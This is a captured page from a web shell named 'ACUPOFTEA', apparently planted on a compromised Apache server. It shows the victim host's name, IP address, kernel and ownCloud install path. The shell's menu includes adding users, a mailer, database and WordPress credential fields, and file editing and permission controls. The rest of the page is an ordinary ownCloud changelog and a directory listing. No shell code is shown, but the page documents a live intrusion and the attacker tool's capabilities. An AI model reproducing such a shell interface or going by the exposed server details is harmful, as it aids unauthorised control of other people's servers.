System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
owncloud
/
216.73.216.146
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for accounting.gulfstore-gcc.com made by tabagkayu.
Folder Name
File Name
File Content
File
changelog.txt
[10.16.0]: https://github.com/owncloud/core/compare/v10.15.3...v10.16.0 ## Summary * Bugfix - Unavailable shares storage will not block folder listing: [#41338](https://github.com/owncloud/core/pull/41338) * Bugfix - Subadmins won't add users to groups: [#41405](https://github.com/owncloud/core/pull/41405) * Bugfix - The phar stream wrapper is disabled by default: [#41406](https://github.com/owncloud/core/pull/41406) * Change - Add user hint in share dialog that password policy can apply: [#41314](https://github.com/owncloud/core/pull/41314) * Change - Update PHP dependencies: [#41287](https://github.com/owncloud/core/pull/41287) * Enhancement - Improve global search experience for Chinese and Japanese input: [#41328](https://github.com/owncloud/core/pull/41328) ## Details * Bugfix - Unavailable shares storage will not block folder listing: [#41338](https://github.com/owncloud/core/pull/41338) In case a shared storage is not available in certain situations no folder listing would be shown to the user. https://github.com/owncloud/core/pull/41338 * Bugfix - Subadmins won't add users to groups: [#41405](https://github.com/owncloud/core/pull/41405) Subadmins won't be able to add user to groups, not even to groups they're managing. Only admins will be able to. https://github.com/owncloud/core/pull/41405 * Bugfix - The phar stream wrapper is disabled by default: [#41406](https://github.com/owncloud/core/pull/41406) Previously, it was only disabled for non-cli access, but now it's disabled globally. https://github.com/owncloud/core/pull/41406 * Change - Add user hint in share dialog that password policy can apply: [#41314](https://github.com/owncloud/core/pull/41314) To avoid user confusion the share dialog informs the user that password policy can apply in case enabled. https://github.com/owncloud/core/pull/41314 * Change - Update PHP dependencies: [#41287](https://github.com/owncloud/core/pull/41287) The following have been updated: - doctrine/deprecations (1.1.3 to 1.1.5) - google/apiclient (v2.16.0 to v2.16.1) - google/auth (v1.37.1 to v1.37.2) - guzzlehttp/guzzle (7.8.1 to 7.9.3) - guzzlehttp/promises (2.0.3 to 2.2.0) - guzzlehttp/psr7 (2.7.0 to 2.7.1) - icewind/smb (3.6.0 to 3.7.0) - icewind/streams (0.7.7 to 0.7.8) - laravel/serializable-closure (1.3.3 to 1.3.7) - league/mime-type-detection (1.15.0 to 1.16.0) - mikey179/vfsstream (1.6.11 to 1.6.12) - monolog/monolog (2.9.3 to 2.10.0) - myclabs/deep-copy (1.12.1 to 1.13.4) - pear/pear-core-minimal (v1.10.15 to v1.10.16) - pear/archive_tar (1.5.0 to 1.6.0) - phpseclib/phpseclib (3.0.39 to 3.0.46) - sabre/dav (4.6.0 to 4.7.0) - sabre/event (5.1.4 to 5.1.7) - sabre/http (5.1.10 to 5.1.12) - sabre/uri (2.3.3 t0 2.3.4) - sabre/vobject (4.5.4 to 4.5.7) - sabre/xml (2.2.7 to 2.2.11) - symfony/console (5.4.40 to 5.4.47) - symfony/deprecation-contracts (2.5.3 to 2.5.4) - symfony/event-dispatcher (5.4.40 to 5.4.45) - symfony/event-dispatcher-contracts (2.5.3 to 2.5.4) - symfony/polyfill-php80 (1.29.0 to 1.33.0) - symfony/process (v5.4.40 to v5.4.47) - symfony/routing (5.4.40 to 5.4.48) - symfony/service-contracts (2.5.3 to 2.5.4) - symfony/string (5.4.40 to 5.4.47) - symfony/translation (5.4.40 to 5.4.45) - symfony/translation-contracts (2.5.3 to 2.5.4) https://github.com/owncloud/core/pull/41287 https://github.com/owncloud/core/pull/41297 https://github.com/owncloud/core/pull/41306 https://github.com/owncloud/core/pull/41307 https://github.com/owncloud/core/pull/41315 https://github.com/owncloud/core/pull/41320 https://github.com/owncloud/core/pull/41327 https://github.com/owncloud/core/pull/41329 https://github.com/owncloud/core/pull/41333 https://github.com/owncloud/core/pull/41334 https://github.com/owncloud/core/pull/41337 https://github.com/owncloud/core/pull/41341 https://github.com/owncloud/core/pull/41344 https://github.com/owncloud/core/pull/41345 https://github.com/owncloud/core/pull/41363 https://github.com/owncloud/core/pull/41366 https://github.com/owncloud/core/pull/41377 https://github.com/owncloud/core/pull/41382 https://github.com/owncloud/core/pull/41390 * Enhancement - Improve global search experience for Chinese and Japanese input: [#41328](https://github.com/owncloud/core/pull/41328) Now the minimum characters input required is 2 for Chinese/Japanese inputs when performing global search. https://github.com/owncloud/core/issues/25021 https://github.com/owncloud/core/issues/9916 https://github.com/owncloud/core/pull/41328 [10.15.3]: https://github.com/owncloud/core/compare/v10.15.2...v10.15.3 ## Summary * Bugfix - Harden remote service resolution: [#41374](https://github.com/owncloud/core/pull/41374) * Bugfix - Disable web updater: [#41149](https://github.com/owncloud/core/issues/41149) ## Details * Bugfix - Harden remote service resolution: [#41374](https://github.com/owncloud/core/pull/41374) Remote services such as webdav, caldav, etc, will be loaded from the app or from a hardcoded list. https://github.com/owncloud/core/pull/41374 * Bugfix - Disable web updater: [#41149](https://github.com/owncloud/core/issues/41149) The web updater is a relic of the past and not recommended for a long time. At the end it can cause more pain than help. In addition the use of the web updater is discouraged by removing the integration in the admin ui. https://github.com/owncloud/core/issues/41149 https://github.com/owncloud/core/pull/41385
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-10-28 09:38:44
..
DIR
-
drwxr-xr-x
2025-12-16 09:39:04
images
DIR
-
drwxr-xr-x
2025-10-28 09:38:44
php53
DIR
-
drwxr-xr-x
2025-10-28 09:38:44
php56
DIR
-
drwxr-xr-x
2025-10-28 09:38:44
php71
DIR
-
drwxr-xr-x
2025-10-28 09:38:44
php81
DIR
-
drwxr-xr-x
2025-10-28 09:38:44
php82
DIR
-
drwxr-xr-x
2025-10-28 09:38:44
.htaccess
text/plain
3.43 KB
-rw-r--r--
2021-12-23 05:18:42
PasswordHash.php
text/x-php
6.67 KB
-rw-r--r--
2021-12-23 05:18:42
_.htaccess
text/plain
315 B
-rw-r--r--
2021-12-23 05:18:42
changelog.txt
text/plain
5.46 KB
-rw-r--r--
2025-10-27 03:26:50
check_suphp.php
text/x-php
101 B
-rw-r--r--
2021-12-23 05:18:42
clone.php
text/x-php
5.13 KB
-rw-r--r--
2025-10-27 08:11:40
config.php
text/x-php
917 B
-rw-r--r--
2025-10-27 03:26:50
edit.php
text/x-php
4.84 KB
-rw-r--r--
2025-10-27 08:11:40
edit.xml
text/html
433 B
-rw-r--r--
2021-12-23 05:18:42
fileindex.php
text/plain
269 B
-rw-r--r--
2021-12-23 05:18:42
import.php
text/x-php
3.86 KB
-rw-r--r--
2025-10-27 08:11:40
info.xml
text/html
3.52 KB
-rw-r--r--
2025-10-27 03:26:50
install.js
text/plain
924 B
-rw-r--r--
2021-12-23 05:18:42
install.php
text/x-php
11.23 KB
-rw-r--r--
2025-10-27 08:11:40
install.xml
text/html
2.5 KB
-rw-r--r--
2021-12-23 05:18:42
md5
text/plain
2.23 KB
-rw-r--r--
2025-10-27 08:11:40
notes.txt
text/plain
1.83 KB
-rw-r--r--
2024-08-07 05:13:12
restore.php
text/x-php
2.83 KB
-rw-r--r--
2025-10-27 08:11:40
update_pass.php
text/x-php
6.64 KB
-rw-r--r--
2023-03-03 09:12:30
upgrade.php
text/x-php
5.77 KB
-rw-r--r--
2025-10-27 08:11:40
upgrade.xml
text/plain
330 B
-rw-r--r--
2021-12-23 05:18:42
~ ACUPOFTEA - accounting.gulfstore-gcc.com